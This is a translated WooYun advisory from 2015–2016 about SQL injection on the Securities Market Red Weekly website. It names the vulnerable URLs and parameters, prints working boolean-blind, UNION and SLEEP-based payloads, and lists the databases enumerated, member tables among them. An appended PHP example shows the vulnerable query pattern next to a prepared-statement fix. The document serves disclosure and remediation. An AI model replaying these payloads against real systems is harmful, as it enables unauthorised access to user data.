
Vulnerability summary

Defect ID: wooyun-2015-0164930

Title: Securities Market Red Weekly (证券市场红周刊): all-server data exposure, tens of millions of records plus nearly 500k member records exposed (bundled)

Vendor: Beijing Ronglian Information Communication Co., Ltd. (北京融联信息传播有限公司)

Author: 路人甲

Submitted: 2015-12-26 20:17

Fix time: 2016-02-08 18:23

Published: 2016-02-08 18:23

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-12-26: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-02-08: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Securities Market Red Weekly all-server data exposure # tens of millions of records + nearly 500k member records exposed (bundled)

Detailed description:

The databases on the same server can all be reached cross-database. Piles of data. Only the user tables were tested.
http://www.hongzhoukan.com/alipay/pay_hb_index.php hb=350&uid=88952634
http://www.hongzhoukan.com/red_player.php?id=143&pid=l0142j9uhh2

Proof of vulnerability:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=143 AND 6123=6123&pid=l0142j9uhh2
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: id=-4297 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7167787871,0x4e63774c534c44696566,0x7179736271),NULL,NULL,NULL#&pid=l0142j9uhh2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=143 AND SLEEP(5)&pid=l0142j9uhh2
---
web application technology: PHP 5.3.5
back-end DBMS: MySQL 5.0.11
available databases [7]:
[*] 88lc
[*] hzk
[*] hzkbbs7
[*] hzkbbsx2
[*] information_schema
[*] test
[*] ucenter

[Screenshot: x1.jpg]

[Screenshot: x2.jpg]


Database: ucenter
Table: uc_members
[10 entries]
back-end DBMS: MySQL 5.0.11
Database: hzkbbs7
Table: dnz_members
[5 entries]

Fix recommendation:

Parameter filtering

Copyright notice: when reproducing, please credit the source 路人甲@乌云
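As an added illustration of the "parameter filtering" fix the reporter recommends (example code written for this page, not the hongzhoukan.com source or anything from the report), the handler below contrasts the pattern that the boolean-, UNION- and time-based payloads on red_player.php?id=...&pid=... rely on with a hardened version that validates each value's shape and binds it through a prepared statement. The table and column names (red_player, title, video_url), the connection details and the use of PHP 7+ with mysqli/mysqlnd are assumptions.

```php
<?php
// Added example, not code from hongzhoukan.com or the report. Table/column names,
// connection details and PHP 7+ with mysqli/mysqlnd are assumptions.

// Assumed connection to the application's own database.
$db = new mysqli('localhost', 'hzk_app', 'REPLACE_ME', 'hzk');
$db->set_charset('utf8mb4');

// VULNERABLE: the raw GET values are spliced into the SQL text, so input such as
// "143 AND SLEEP(5)" or "-4297 UNION ALL SELECT ..." rewrites the statement itself.
function getPlayerVulnerable(mysqli $db, string $id, string $pid): ?array
{
    $sql = "SELECT title, video_url FROM red_player WHERE id = $id AND pid = '$pid'";
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// HARDENED: validate the shape of each parameter, then bind it with a prepared
// statement so the value travels as data and can never change the query structure.
function getPlayerSafe(mysqli $db, string $id, string $pid): ?array
{
    // id must be a positive integer; "143 AND 6123=6123" fails this check outright.
    $idInt = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($idInt === false) {
        return null;
    }
    // pid in the report is a short alphanumeric token (l0142j9uhh2); allow-list that shape.
    if (!preg_match('/^[A-Za-z0-9]{1,32}$/', $pid)) {
        return null;
    }
    $stmt = $db->prepare('SELECT title, video_url FROM red_player WHERE id = ? AND pid = ?');
    $stmt->bind_param('is', $idInt, $pid);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Accept only string-typed query values; array forms such as id[]=1 are rejected.
$id  = isset($_GET['id'])  && is_string($_GET['id'])  ? $_GET['id']  : '';
$pid = isset($_GET['pid']) && is_string($_GET['pid']) ? $_GET['pid'] : '';
$row = getPlayerSafe($db, $id, $pid);
if ($row === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($row, JSON_UNESCAPED_UNICODE);
```

The seven databases enumerated above from a single injection point (ucenter, hzkbbs7 and the rest) also show the value of a per-application MySQL account granted only on its own schema, so one injected query cannot reach another application's member table.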


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused

Vulnerability Rank: 15 (WooYun rating)